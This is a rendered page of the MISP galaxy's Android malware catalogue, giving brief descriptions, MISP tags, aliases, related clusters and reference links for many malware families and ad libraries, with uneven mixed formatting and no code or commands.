MISP Galaxy Clusters

MISP Galaxy Cluster

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Introduction

The MISP threat sharing platform is a free and open source software helping information sharing of threat intelligence including cyber security indicators, financial fraud or counter-terrorism information. The MISP project includes multiple sub-projects to support the operational requirements of analysts and improve the overall quality of information shared.

MISP galaxy is a simple method to express a large object called cluster that can be attached to MISP events or attributes. A cluster can be composed of one or more elements. Elements are expressed as key-values. There are default vocabularies available in MISP galaxy but those can be overwritten, replaced or updated as you wish. Existing clusters and vocabularies can be used as-is or as a template. MISP distribution can be applied to each cluster to permit a limited or broader distribution scheme. The following document is generated from the machine-readable JSON describing the MISP galaxy.
Funding and Support

The MISP project is financially and resource supported by CIRCL Computer Incident Response Center Luxembourg.

A CEF (Connecting Europe Facility) funding under CEF-TC-2016-3 - Cyber Security has been granted from 1st September 2017 until 31th August 2019 as Improving MISP as building blocks for next-generation information sharing.

Co-financed by the European Union
Connecting Europe Facility

If you are interested to co-fund projects around MISP, feel free to get in touch with us.
MISP galaxy

Android

Android malware galaxy based on multiple open sources.

Android is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

authors

Unknown

CopyCat

CopyCat is a fully developed malware with vast capabilities, including rooting devices, establishing persistency, and injecting code into Zygote – a daemon responsible for launching apps in the Android operating system – that allows the malware to control any activity on the device.

The tag is: misp-galaxy:android="CopyCat"

Table 1. Table References

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Andr/Dropr-FH

Andr/Dropr-FH can silently record audio and video, monitor texts and calls, modify files, and ultimately spawn ransomware.

The tag is: misp-galaxy:android="Andr/Dropr-FH"

Andr/Dropr-FH is also known as:

• GhostCtrl

Andr/Dropr-FH has relationships with:

• similar: misp-galaxy:malpedia="GhostCtrl" with estimative-language:likelihood-probability="likely"

Table 2. Table References

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<th>Links</th>
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Judy

The malware, dubbed Judy, is an auto-clicking adware which was found on 41 apps developed by a Korean company. The malware uses infected devices to generate large amounts of fraudulent clicks on advertisements, generating revenues for the perpetrators behind it.

The tag is: misp-galaxy:android="Judy"

Table 3. Table References

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<tbody>
<tr>
<td><a href="http://fortune.com/2017/05/28/android-malware-judy/">http://fortune.com/2017/05/28/android-malware-judy/</a></td>
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<tr>
<td><a href="https://blog.checkpoint.com/2017/05/25/judy-malware-possibly-largest-malware-campaign-found-google-play/">https://blog.checkpoint.com/2017/05/25/judy-malware-possibly-largest-malware-campaign-found-google-play/</a></td>
</tr>
</tbody>
</table>

RedAlert2

The trojan waits in hiding until the user opens a banking or social media app. When this happens, the trojan shows an HTML-based overlay on top of the original app, alerting the user of an error, and asking to reauthenticate. Red Alert then collects the user’s credentials and sends them to its C&C server.

The tag is: misp-galaxy:android="RedAlert2"

RedAlert2 has relationships with:

- similar: misp-galaxy:malpedia="RedAlert2" with estimative-language:likelihood-probability="likely"

Table 4. Table References

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<tr>
<td><a href="https://wwwthreatfabric.com/blogs/new_android_trojan_targeting_over_60_banks_and_social_apps.html">https://wwwthreatfabric.com/blogs/new_android_trojan_targeting_over_60_banks_and_social_apps.html</a></td>
</tr>
</tbody>
</table>

Tizi

Tizi is a fully featured backdoor that installs spyware to steal sensitive data from popular social media applications. The Google Play Protect security team discovered this family in September 2017 when device scans found an app with rooting capabilities that exploited old vulnerabilities. The team used this app to find more applications in the Tizi family, the oldest of which is from October 2015. The Tizi app developer also created a website and used social media to encourage more app
installs from Google Play and third-party websites.

The tag is: *misp-galaxy:android*="Tizi"

**Table 5. Table References**

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**DoubleLocker**

DoubleLocker can change the device’s PIN, preventing victims from accessing their devices, and also encrypts the data requesting a ransom. It will misuse accessibility services after being installed by impersonating the Adobe Flash player - similar to BankBot.

The tag is: *misp-galaxy:android*="DoubleLocker"

DoubleLocker has relationships with:

- similar: *misp-galaxy:malpedia*="DoubleLocker" with estimative-language:likelihood-probability="likely"

**Table 6. Table References**

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**Svpeng**

Svpeng is a Banking trojan which acts as a keylogger. If the Android device is not Russian, Svpeng will ask for permission to use accessibility services. In abusing this service it will gain administrator rights allowing it to draw over other apps, send and receive SMS and take screenshots when keys are pressed.

The tag is: *misp-galaxy:android*="Svpeng"

Svpeng is also known as:

- Invisible Man

Svpeng has relationships with:

- similar: *misp-galaxy:tool*="Svpeng" with estimative-language:likelihood-probability="likely"
- similar: *misp-galaxy:malpedia*="Svpeng" with estimative-language:likelihood-probability="likely"

**Table 7. Table References**

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LokiBot

LokiBot is a banking trojan for Android 4.0 and higher. It can steal the information and send SMS messages. It has the ability to start web browsers, and banking applications, along with showing notifications impersonating other apps. Upon attempt to remove it will encrypt the devices’ external storage requiring Bitcoins to decrypt files.

The tag is: `misp-galaxy:android="LokiBot"`

LokiBot has relationships with:

- similar: `misp-galaxy:malpedia="Loki Password Stealer (PWS)"` with `estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:malpedia="LokiBot"` with `estimative-language:likelihood-probability="likely"

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<td><a href="https://clientsidedetection.com/lokibot_the_first_hybrid_android_malware.html">https://clientsidedetection.com/lokibot_the_first_hybrid_android_malware.html</a></td>
</tr>
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</table>

BankBot

The main goal of this malware is to steal banking credentials from the victim’s device. It usually impersonates flash player updaters, android system tools, or other legitimate applications.

The tag is: `misp-galaxy:android="BankBot"`

BankBot has relationships with:

- similar: `misp-galaxy:malpedia="Anubis (Android)"` with `estimative-language:likelihood-probability="likely"

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<td><a href="https://forensics.spreitzenbarth.de/android-malware/">https://forensics.spreitzenbarth.de/android-malware/</a></td>
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</table>
**Viking Horde**

In rooted devices, Viking Horde installs software and executes code remotely to get access to the mobile data.

The tag is: `misp-galaxy:android="Viking Horde"`

*Table 10. Table References*

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**HummingBad**

A Chinese advertising company has developed this malware. The malware has the power to take control of devices; it forces users to click advertisements and download apps. The malware uses a multistage attack chain.

The tag is: `misp-galaxy:android="HummingBad"`

HummingBad has relationships with:

- similar: `misp-galaxy:mitre-malware="HummingBad - S0322"` with estimative-language:likelihood-probability="likely"

*Table 11. Table References*

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**Ackposts**

Ackposts is a Trojan horse for Android devices that steals the Contacts information from the compromised device and sends it to a predetermined location.

The tag is: `misp-galaxy:android="Ackposts"`

*Table 12. Table References*

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**Wirex**

Wirex is a Trojan horse for Android devices that opens a backdoor on the compromised device which then joins a botnet for conducting click fraud.
The tag is: misp-galaxy:android="Wirex"

Table 13. Table References

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**WannaLocker**

WannaLocker is a strain of ransomware for Android devices that encrypts files on the device's external storage and demands a payment to decrypt them.

The tag is: misp-galaxy:android="WannaLocker"

Table 14. Table References

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<tbody>
<tr>
<td><a href="https://fossbytes.com/wannalocker-ransomware-wannacry-android/">https://fossbytes.com/wannalocker-ransomware-wannacry-android/</a></td>
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</table>

**Switcher**

Switcher is a Trojan horse for Android devices that modifies Wi-Fi router DNS settings. Switcher attempts to infiltrate a router’s admin interface on the devices’ WIFI network by using brute force techniques. If the attack succeeds, Switcher alters the DNS settings of the router, making it possible to reroute DNS queries to a network controlled by the malicious actors.

The tag is: misp-galaxy:android="Switcher"

Switcher has relationships with:

- similar: misp-galaxy:malpedia="Switcher" with estimative-language:likelihood-probability="likely"

Table 15. Table References

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<tr>
<td><a href="http://www.zdnet.com/article/this-android-infecting-trojan-malware-uses-your-phone-to-attack-your-router/">http://www.zdnet.com/article/this-android-infecting-trojan-malware-uses-your-phone-to-attack-your-router/</a></td>
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<tr>
<td><a href="https://www.theregister.co.uk/2017/01/03/android_trojan_targets_routers/">https://www.theregister.co.uk/2017/01/03/android_trojan_targets_routers/</a></td>
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**Vibleaker**

Vibleaker was an app available on the Google Play Store named Beaver Gang Counter that contained malicious code that after specific orders from its maker would scan the user’s phone for the Viber app, and then steal photos and videos recorded or sent through the app.
ExpensiveWall

ExpensiveWall is Android malware that sends fraudulent premium SMS messages and charges users' accounts for fake services without their knowledge.

Fakem Rat

Fakem RAT makes their network traffic look like well-known protocols (e.g. Messenger traffic, HTML pages).

Cepsohord

Cepsohord is a Trojan horse for Android devices that uses compromised devices to commit click fraud, modify DNS settings, randomly delete essential files, and download additional malware such as ransomware.

The tag is: *misp-galaxy:android*="ExpensiveWall"

The tag is: *misp-galaxy:android*="Cepsohord"

The tag is: *misp-galaxy:android*="Fakem Rat"
**GM Bot**

GM Bot – also known as Acecard, SlemBunk, or Bankosy – scams people into giving up their banking log-in credentials and other personal data by displaying overlays that look nearly identical to banking apps log-in pages. Subsequently, the malware intercepts SMS to obtain two-factor authentication PINs, giving cybercriminals full access to bank accounts.

The tag is: `misp-galaxy:android="GM Bot"`

GM Bot is also known as:

- Acecard
- SlemBunk
- Bankosy

GM Bot has relationships with:

- similar: `misp-galaxy:tool="Slempo"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:android="Bankosy"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:malpedia="Slempo"` with `estimative-language:likelihood-probability="likely"`

**Moplus**

The Wormhole vulnerability in the Moplus SDK could be exploited by hackers to open an unsecured and unauthenticated HTTP server connection on the user’s device, and this connection is established in the background without the user’s knowledge.

The tag is: `misp-galaxy:android="Moplus"`

**Adwind**

Adwind is a backdoor written purely in Java that targets system supporting the Java runtime environment. Commands that can be used, among other things, to display messages on the system, open URLs, update the malware, download/execute files, and download/load plugins. According to
the author, the backdoor component can run on Windows, Mac OS, Linux and Android platforms providing rich capabilities for remote control, data gathering, data exfiltration and lateral movement.

The tag is: misp-galaxy:android="Adwind"

Adwind is also known as:

- AlienSpy
- Frutas
- Unrecom
- Sockrat
- Jsocket
- jRat
- Backdoor:Java/Adwind

Adwind has relationships with:

- similar: misp-galaxy:rat="Adwind RAT" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:tool="Adwind" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:android="Sockrat" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="AdWind" with estimative-language:likelihood-probability="likely"

**Table 22. Table References**

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<tr>
<td><a href="https://securelist.com/adwind-faq/73660/">https://securelist.com/adwind-faq/73660/</a></td>
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**AdSms**

Adsms is a Trojan horse that may send SMS messages from Android devices.

The tag is: misp-galaxy:android="AdSms"

**Table 23. Table References**

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<tr>
<td><a href="https://www.fortiguard.com/encyclopedia/virus/7389670">https://www.fortiguard.com/encyclopedia/virus/7389670</a></td>
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**Airpush**

Airpush is a very aggresive Ad - Network
The tag is: misp-galaxy:android="Airpush"

Airpush is also known as:

- StopSMS

Table 24. Table References

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**BeanBot**

BeanBot forwards device's data to a remote server and sends out premium-rate SMS messages from the infected device.

The tag is: misp-galaxy:android="BeanBot"

Table 25. Table References

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<tr>
<td><a href="https://www.f-secure.com/v-descs/trojan_android_beanbot.shtml">https://www.f-secure.com/v-descs/trojan_android_beanbot.shtml</a></td>
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</table>

**Kemoge**

Kemoge is adware that disguises itself as popular apps via repackaging, then allows for a complete takeover of the users Android device.

The tag is: misp-galaxy:android="Kemoge"

Kemoge has relationships with:

- similar: misp-galaxy:mitre-malware="ShiftyBug - S0294" with estimative-language:likelihood-probability="likely"

Table 26. Table References

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<tr>
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**Ghost Push**

Ghost Push is a family of malware that infects the Android OS by automatically gaining root access, downloading malicious software, masquerading as a system app, and then losing root access, which then makes it virtually impossible to remove the infection even by factory reset unless the firmware is reflashed.

The tag is: misp-galaxy:android="Ghost Push"
BeNews

The BeNews app is a backdoor app that uses the name of defunct news site BeNews to appear legitimate. After installation it bypasses restrictions and downloads additional threats to the compromised device.

The tag is: `misp-galaxy:android="BeNews"`

Accstealer

Accstealer is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: `misp-galaxy:android="Accstealer"`

Acnetdoor

Acnetdoor is a detection for Trojan horses on the Android platform that open a back door on the compromised device.

The tag is: `misp-galaxy:android="Acnetdoor"`

Acnetsteal

Acnetsteal is a detection for Trojan horses on the Android platform that steal information from the compromised device.
The tag is: *misp-galaxy:android*="Acnetsteal"

### Table 31. Table References

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**Actech**

Actech is a Trojan horse for Android devices that steals information and sends it to a remote location.

The tag is: *misp-galaxy:android*="Actech"

### Table 32. Table References

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**AdChina**

AdChina is an advertisement library that is bundled with certain Android applications.

The tag is: *misp-galaxy:android*="AdChina"

### Table 33. Table References

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**Adfonic**

Adfonic is an advertisement library that is bundled with certain Android applications.

The tag is: *misp-galaxy:android*="Adfonic"

### Table 34. Table References

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**AdInfo**

AdInfo is an advertisement library that is bundled with certain Android applications.

The tag is: *misp-galaxy:android*="AdInfo"

### Table 35. Table References
Adknowledge

Adknowledge is an advertisement library that is bundled with certain Android applications.

The tag is: `misp-galaxy:android="Adknowledge"

Table 36. Table References

AdMarvel

AdMarvel is an advertisement library that is bundled with certain Android applications.

The tag is: `misp-galaxy:android="AdMarvel"

Table 37. Table References

AdMob

AdMob is an advertisement library that is bundled with certain Android applications.

The tag is: `misp-galaxy:android="AdMob"

Table 38. Table References

Aldr

Aldr is a Trojan horse that steals information from Android devices.

The tag is: `misp-galaxy:android="Aldr"

Table 39. Table References
**Aduru**

Aduru is an advertisement library that is bundled with certain Android applications.

The tag is: *misp-galaxy:android=*Aduru"

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**Adwhirl**

Adwhirl is an advertisement library that is bundled with certain Android applications.

The tag is: *misp-galaxy:android=*Adwhirl"

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**Adwlauncher**

Adwlauncher is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: *misp-galaxy:android=*Adwlauncher"

---

**Adwo**

Adwo is an advertisement library that is bundled with certain Android applications.

The tag is: *misp-galaxy:android=*Adwo"

---

**Airad**

Airad is an advertisement library that is bundled with certain Android applications.
The tag is: *misp-galaxy:android*="Airad"

**Table 44. Table References**

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### Alienspy

Alienspy is a Trojan horse for Android devices that steals information from the compromised device. It may also download potentially malicious files.

The tag is: *misp-galaxy:android*="Alienspy"

**Table 45. Table References**

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### AmazonAds

AmazonAds is an advertisement library that is bundled with certain Android applications.

The tag is: *misp-galaxy:android*="AmazonAds"

**Table 46. Table References**

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### Answerbot

Answerbot is a Trojan horse that opens a back door on Android devices.

The tag is: *misp-galaxy:android*="Answerbot"

**Table 47. Table References**

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### Antammi

Antammi is a Trojan horse that steals information from Android devices.

The tag is: *misp-galaxy:android*="Antammi"

**Table 48. Table References**
Apkmores

Apkmore is an advertisement library that is bundled with certain Android applications.

The tag is: `misp-galaxy:android="Apkmore"`

Table 49. Table References

Aplogs

Aplog is a Trojan horse for Android devices that steals information from the device.

The tag is: `misp-galaxy:android="Aplog"`

Table 50. Table References

Appendas

Appenda is an advertisement library that is bundled with certain Android applications.

The tag is: `misp-galaxy:android="Appenda"`

Table 51. Table References

Apperhands

Apperhand is an advertisement library that is bundled with certain Android applications.

The tag is: `misp-galaxy:android="Apperhand"`

Table 52. Table References
**Appleservice**

Appleservice is a Trojan horse for Android devices that may steal information from the compromised device.

The tag is: *misp-galaxy:android="Appleservice"*

*Table 53. Table References*

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**AppLovin**

AppLovin is an advertisement library that is bundled with certain Android applications.

The tag is: *misp-galaxy:android="AppLovin"*

*Table 54. Table References*

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**Arspam**

Arspam is a Trojan horse for Android devices that sends spam SMS messages to contacts on the compromised device.

The tag is: *misp-galaxy:android="Arspam"*

*Table 55. Table References*

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**Aurecord**

Aurecord is a spyware application for Android devices that allows the device it is installed on to be monitored.

The tag is: *misp-galaxy:android="Aurecord"*

*Table 56. Table References*

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**Backapp**

Backapp is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: `misp-galaxy:android="Backapp"`

**Backdexer**

Backdexer is a Trojan horse for Android devices that may send premium-rate SMS messages from the compromised device.

The tag is: `misp-galaxy:android="Backdexer"`

**Backflash**

Backflash is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.

The tag is: `misp-galaxy:android="Backflash"`

**Backscript**

Backscript is a Trojan horse for Android devices that downloads files onto the compromised device.

The tag is: `misp-galaxy:android="Backscript"`
**Badaccents**

Badaccents is a Trojan horse for Android devices that may download apps on the compromised device.

The tag is: \texttt{misp-galaxy:android=\textit{Badaccents}}

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**Badpush**

Badpush is an advertisement library that is bundled with certain Android applications.

The tag is: \texttt{misp-galaxy:android=\textit{Badpush}}

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**Ballonpop**

Ballonpop is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: \texttt{misp-galaxy:android=\textit{Ballonpop}}

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<th>Table 63. Table References</th>
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**Bankosy**

Bankosy is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: \texttt{misp-galaxy:android=\textit{Bankosy}}

Bankosy has relationships with:

- similar: \texttt{misp-galaxy:tool=Slempo} with \texttt{estimative-language:likelihood-probability=likely}
- similar: \texttt{misp-galaxy:android=GM Bot} with \texttt{estimative-language:likelihood-probability=likely}
- similar: \texttt{misp-galaxy:malpedia=Slempo} with \texttt{estimative-language:likelihood-probability=likely}
Bankun

Bankun is a Trojan horse for Android devices that replaces certain banking applications on the compromised device.

The tag is: misp-galaxy:android="Bankun"

Basebridge

Basebridge is a Trojan horse that attempts to send premium-rate SMS messages to predetermined numbers.

The tag is: misp-galaxy:android="Basebridge"

Basedao

Basedao is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Basedao"

Batterydoctor

Batterydoctor is Trojan that makes exaggerated claims about the device's ability to recharge the battery, as well as steal information.

The tag is: misp-galaxy:android="Batterydoctor"
**Beaglespy**

Beaglespy is an Android mobile detection for the Beagle spyware program as well as its associated client application.

The tag is: `misp-galaxy:android="Beaglespy"`

**Becuro**

Becuro is a Trojan horse for Android devices that downloads potentially malicious files onto the compromised device.

The tag is: `misp-galaxy:android="Becuro"`

**Beita**

Beita is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: `misp-galaxy:android="Beita"`

**Bgserv**

Bgserv is a Trojan that opens a back door and transmits information from the device to a remote location.

The tag is: `misp-galaxy:android="Bgserv"`
Biigespy is an Android mobile detection for the Biige spyware program as well as its associated client application.

The tag is: misp-galaxy:android="Biigespy"

Bmaster is a Trojan horse on the Android platform that opens a back door, downloads files and steals potentially confidential information from the compromised device.

The tag is: misp-galaxy:android="Bmaster"

Bossefiv is a Trojan horse for Android devices that steals information.

The tag is: misp-galaxy:android="Bossefiv"

Boxpush is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Boxpush"
**Burstly**

Burstly is an advertisement library that is bundled with certain Android applications.

The tag is: *misp-galaxy:android*="Burstly"

*Table 77. Table References*

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**Buzzcity**

Buzzcity is an advertisement library that is bundled with certain Android applications.

The tag is: *misp-galaxy:android*="Buzzcity"

*Table 78. Table References*

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**ByPush**

ByPush is an advertisement library that is bundled with certain Android applications.

The tag is: *misp-galaxy:android*="ByPush"

*Table 79. Table References*

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</table>

**Cajino**

Cajino is a Trojan horse for Android devices that opens a back door on the compromised device.

The tag is: *misp-galaxy:android*="Cajino"

*Table 80. Table References*

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**Casee**

Casee is an advertisement library that is bundled with certain Android applications.
Catchtoken

Catchtoken is a Trojan horse for Android devices that intercepts SMS messages and opens a back door on the compromised device.

The tag is: misp-galaxy:android="Catchtoken"

Cauly

Cauly is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Cauly"

Cellshark

Cellshark is a spyware application for Android devices that periodically gathers information from the device and uploads it to a predetermined location.

The tag is: misp-galaxy:android="Cellshark"

Centero

Centero is a Trojan horse for Android devices that displays advertisements on the compromised device.

The tag is: misp-galaxy:android="Centero"
Chuli

Chuli is a Trojan horse for Android devices that opens a back door and may steal information from the compromised device.

The tag is: misp-galaxy:android="Chuli"

Citmo

Citmo is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Citmo"

Claco

Claco is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Claco"

Clevernet

Clevernet is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Clevernet"
Cnappbox

Cnappbox is an advertisement library that is bundled with certain Android applications.

The tag is: *misp-galaxy:android="Cnappbox"*

Table 90. Table References

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Cobblerone

Cobblerone is a spyware application for Android devices that can track the phone’s location and remotely erase the device.

The tag is: *misp-galaxy:android="Cobblerone"*

Table 91. Table References

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Coolpaperleak

Coolpaperleak is a Trojan horse for Android devices that steals information and sends it to a remote location.

The tag is: *misp-galaxy:android="Coolpaperleak"*

Table 92. Table References

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</table>

Coolreaper

Coolreaper is a Trojan horse for Android devices that opens a back door on the compromised device. It may also steal information and download potentially malicious files.

The tag is: *misp-galaxy:android="Coolreaper"*

Table 93. Table References

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Cosha
Cosha is a spyware program for Android devices that monitors and sends certain information to a remote location.

The tag is: misp-galaxy:android="Cosha"

Table 94. Table References

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Counterclank
Counterclank is a Trojan horse for Android devices that steals information.

The tag is: misp-galaxy:android="Counterclank"

Table 95. Table References

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Crazymedia
Crazymedia is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Crazymedia"

Table 96. Table References

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Crisis
Crisis is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.

The tag is: misp-galaxy:android="Crisis"

Crisis has relationships with:

- similar: misp-galaxy:malpedia="RCS" with estimative-language:likelihood-probability="likely"

Table 97. Table References

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</table>
**Crusewind**

Crusewind is a Trojan horse for Android devices that sends SMS messages to a premium-rate number.

The tag is: *misp-galaxy:android="Crusewind"*

Table 98. Table References


**Dandro**

Dandro is a Trojan horse for Android devices that allows a remote attacker to gain control over the device and steal information from it.

The tag is: *misp-galaxy:android="Dandro"*

Table 99. Table References


**Daoyoudao**

Daoyoudao is an advertisement library that is bundled with certain Android applications.

The tag is: *misp-galaxy:android="Daoyoudao"*

Table 100. Table References


**Deathring**

Deathring is a Trojan horse for Android devices that may perform malicious activities on the compromised device.

The tag is: *misp-galaxy:android="Deathring"*

Table 101. Table References

Deeveemap

Deeveemap is a Trojan horse for Android devices that downloads potentially malicious files onto the compromised device.

The tag is: `misp-galaxy:android="Deeveemap"`

Table 102. Table References

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Dendoroid

Dendoroid is a Trojan horse for Android devices that opens a back door, steals information, and may perform other malicious activities on the compromised device.

The tag is: `misp-galaxy:android="Dendoroid"`

Table 103. Table References

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Dengaru

Dengaru is a Trojan horse for Android devices that performs click-fraud from the compromised device.

The tag is: `misp-galaxy:android="Dengaru"`

Table 104. Table References

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Diandong

Diandong is an advertisement library that is bundled with certain Android applications.

The tag is: `misp-galaxy:android="Diandong"`

Table 105. Table References

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**Dianjin**

Dianjin is an advertisement library that is bundled with certain Android applications.

The tag is: `misp-galaxy:android="Dianjin"`

**Table 106. Table References**

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**Dogowar**

Dogowar is a Trojan horse on the Android platform that sends SMS texts to all contacts on the device. It is a repackaged version of a game application called Dog Wars, which can be downloaded from a third party market and must be manually installed.

The tag is: `misp-galaxy:android="Dogowar"`

**Table 107. Table References**

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**Domob**

Domob is an advertisement library that is bundled with certain Android applications.

The tag is: `misp-galaxy:android="Domob"`

**Table 108. Table References**

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**Dougalek**

Dougalek is a Trojan horse for Android devices that steals information from the compromised device. The threat is typically disguised to display a video.

The tag is: `misp-galaxy:android="Dougalek"`

**Table 109. Table References**

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**Dowgin**

Dowgin is an advertisement library that is bundled with certain Android applications.

The tag is: `misp-galaxy:android="Dowgin"`

*Table 110. Table References*

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**Droidsheep**

Droidsheep is a hacktool for Android devices that hijacks social networking accounts on compromised devices.

The tag is: `misp-galaxy:android="Droidsheep"`

*Table 111. Table References*

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**Dropdialer**

Dropdialer is a Trojan horse for Android devices that sends SMS messages to a premium-rate phone number.

The tag is: `misp-galaxy:android="Dropdialer"`

*Table 112. Table References*

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**Dupvert**

Dupvert is a Trojan horse for Android devices that opens a back door and steals information from the compromised device. It may also perform other malicious activities.

The tag is: `misp-galaxy:android="Dupvert"`

*Table 113. Table References*

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**Dynamicit**

Dynamicit is an advertisement library that is bundled with certain Android applications.

The tag is: `misp-galaxy:android="Dynamicit"`

*Table 114. Table References*

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**Ecardgrabber**

Ecardgrabber is an application that attempts to read details from NFC enabled credit cards. It attempts to read information from NFC enabled credit cards that are in close proximity.

The tag is: `misp-galaxy:android="Ecardgrabber"`

*Table 115. Table References*

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**Ecobatry**

Ecobatry is a Trojan horse for Android devices that steals information and sends it to a remote location.

The tag is: `misp-galaxy:android="Ecobatry"`

*Table 116. Table References*

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**Enesoluty**

Enesoluty is a Trojan horse for Android devices that steals information and sends it to a remote location.

The tag is: `misp-galaxy:android="Enesoluty"`

*Table 117. Table References*

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**Everbadge**

Everbadge is an advertisement library that is bundled with certain Android applications.

The tag is: `misp-galaxy:android="Everbadge"`

**Table 118. Table References**

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**Ewalls**

Ewalls is a Trojan horse for the Android operating system that steals information from the mobile device.

The tag is: `misp-galaxy:android="Ewalls"`

**Table 119. Table References**

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**Exprespam**

Exprespam is a Trojan horse for Android devices that displays a fake message and steals personal information stored on the compromised device.

The tag is: `misp-galaxy:android="Exprespam"`

**Table 120. Table References**

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**Fakealbums**

Fakealbums is a Trojan horse for Android devices that monitors and forwards received messages from the compromised device.

The tag is: `misp-galaxy:android="Fakealbums"`

**Table 121. Table References**

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**Fakeangry**

Fakeangry is a Trojan horse on the Android platform that opens a back door, downloads files, and steals potentially confidential information from the compromised device.

The tag is: `misp-galaxy:android="Fakeangry"`

*Table 122. Table References*

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**Fakeapp**

Fakeapp is a Trojan horse for Android devices that downloads configuration files to display advertisements and collects information from the compromised device.

The tag is: `misp-galaxy:android="Fakeapp"`

*Table 123. Table References*

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**Fakebanco**

Fakebanco is a Trojan horse for Android devices that redirects users to a phishing page in order to steal their information.

The tag is: `misp-galaxy:android="Fakebanco"`

*Table 124. Table References*

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**Fakebank**

Fakebank is a Trojan horse that steals information from the compromised device.

The tag is: `misp-galaxy:android="Fakebank"`

*Table 125. Table References*

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</table>
**Fakebank.B**

Fakebank.B is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.

The tag is: `misp-galaxy:android="Fakebank.B"`

*Table 126. Table References*

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**Fakebok**

Fakebok is a Trojan horse for Android devices that sends SMS messages to premium phone numbers.

The tag is: `misp-galaxy:android="Fakebok"`

*Table 127. Table References*

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**Fakedaum**

Fakedaum is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: `misp-galaxy:android="Fakedaum"`

*Table 128. Table References*

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**Fakedefender**

Fakedefender is a Trojan horse for Android devices that displays fake security alerts in an attempt to convince the user to purchase an app in order to remove non-existent malware or security risks from the device.

The tag is: `misp-galaxy:android="Fakedefender"`

*Table 129. Table References*

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</table>
**Fakedefender.B**

Fakedefender.B is a Trojan horse for Android devices that displays fake security alerts in an attempt to convince the user to purchase an app in order to remove non-existent malware or security risks from the device.

The tag is: `misp-galaxy:android="Fakedefender.B"`

**Table 130. Table References**

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**Fakedown**

Fakedown is a Trojan horse for Android devices that downloads more malicious apps onto the compromised device.

The tag is: `misp-galaxy:android="Fakedown"`

**Table 131. Table References**

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**Fakeflash**

Fakeflash is a Trojan horse for Android devices that installs a fake Flash application in order to direct users to a website.

The tag is: `misp-galaxy:android="Fakeflash"`

**Table 132. Table References**

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**Fakegame**

Fakegame is a Trojan horse for Android devices that displays advertisements and steals information from the compromised device.

The tag is: `misp-galaxy:android="Fakegame"`

**Table 133. Table References**

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<th>Links</th>
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Fakeguard

Fakeguard is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: `misp-galaxy:android="Fakeguard"`

Table 134. Table References

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Fakejob

Fakejob is a Trojan horse for Android devices that redirects users to scam websites.

The tag is: `misp-galaxy:android="Fakejob"`

Table 135. Table References

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Fakekakao

Fakekakao is a Trojan horse for Android devices sends SMS messages to contacts stored on the compromised device.

The tag is: `misp-galaxy:android="Fakekakao"`

Table 136. Table References

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Fakelemon

Fakelemon is a Trojan horse for Android devices that blocks certain SMS messages and may subscribe to services without the user’s consent.

The tag is: `misp-galaxy:android="Fakelemon"`

Table 137. Table References

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**Fakelicense**

Fakelicense is a Trojan horse that displays advertisements on the compromised device.

The tag is: `misp-galaxy:android="Fakelicense"`

*Table 138. Table References*

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**Fakelogin**

Fakelogin is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: `misp-galaxy:android="Fakelogin"`

*Table 139. Table References*

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**FakeLookout**

FakeLookout is a Trojan horse for Android devices that opens a back door and steals information on the compromised device.

The tag is: `misp-galaxy:android="FakeLookout"`

*Table 140. Table References*

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</table>

**FakeMart**

FakeMart is a Trojan horse for Android devices that may send SMS messages to premium rate numbers. It may also block incoming messages and steal information from the compromised device.

The tag is: `misp-galaxy:android="FakeMart"`

*Table 141. Table References*

<table>
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<th>Links</th>
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</table>
Fakemini

Fakemini is a Trojan horse for Android devices that disguises itself as an installation for the Opera Mini browser and sends premium-rate SMS messages to a predetermined number.

The tag is: `misp-galaxy:android="Fakemini"`

Table 142. Table References

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Fakemrat

Fakemrat is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.

The tag is: `misp-galaxy:android="Fakemrat"`

Table 143. Table References

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Fakeneflic

Fakeneflic is a Trojan horse that steals information from Android devices.

The tag is: `misp-galaxy:android="Fakeneflic"`

Table 144. Table References

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Fakenotify

Fakenotify is a Trojan horse for Android devices that sends SMS messages to premium-rate phone numbers, collects and sends information, and periodically displays Web pages. It also downloads legitimate apps onto the compromised device.

The tag is: `misp-galaxy:android="Fakenotify"`

Table 145. Table References

<table>
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<th>Links</th>
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</table>
**Fakepatch**

Fakepatch is a Trojan horse for Android devices that downloads more files on to the device.

The tag is: `misp-galaxy:android="Fakepatch"`

*Table 146. Table References*

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**Fakeplay**

Fakeplay is a Trojan horse for Android devices that steals information from the compromised device and sends it to a predetermined email address.

The tag is: `misp-galaxy:android="Fakeplay"`

*Table 147. Table References*

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<th>Links</th>
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**Fakescarav**

Fakescarav is a Trojan horse for Android devices that displays fake security alerts in an attempt to convince the user to pay in order to remove non-existent malware or security risks from the device.

The tag is: `misp-galaxy:android="Fakescarav"`

*Table 148. Table References*

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**Fakesecsuit**

Fakesecsuit is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: `misp-galaxy:android="Fakesecsuit"`

*Table 149. Table References*

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<th>Links</th>
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</table>
**Fakesucon**

Fakesucon is a Trojan horse program for Android devices that sends SMS messages to premium-rate phone numbers.

